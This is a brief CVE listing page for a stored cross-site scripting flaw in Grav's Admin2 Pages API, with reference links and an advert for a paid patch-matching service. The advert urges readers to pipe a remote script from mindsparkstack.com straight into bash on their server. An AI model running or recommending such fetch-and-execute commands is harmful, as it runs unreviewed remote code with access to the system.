CVE-2026-11982
Published: Thu, 18 Jun 2026 17:16
Summary
Grav 2.0.0-rc.9 with Admin2 2.0.0-rc.14 contains a stored cross-site scripting (XSS) vulnerability in the Admin2 Pages API save flow.
Are YOU affected by CVE-2026-11982?
5-second check on your actual server. Reads /etc/os-release, uname -r, and dpkg-query; matches against the live USN + Debian Security Tracker feeds; tells you whether CVE-2026-11982 (and any other live CVE) applies. Anonymous, no signup.
curl https://mindsparkstack.com/scan.sh | bash
References
- https://fluidattacks.com/es/advisories/luis
- https://github.com/getgrav/grav-plugin-api
- https://github.com/getgrav/grav-plugin-api/commit/b8ca62eddb7dbea92075a78b1c0a507f03d66d4a
- https://github.com/getgrav/grav/security/advisories/GHSA-5wc5-7v9g-f7v6
- https://github.com/getgrav/grav/security/advisories/GHSA-5wc5-7v9g-f7v6
StackPatch runs this match against YOUR installed packages every hour
Free (3 servers) / from $9/mo (14-day free trial) / Solo $9/mo / Pro $29/mo / Team $79/mo. Indie pricing.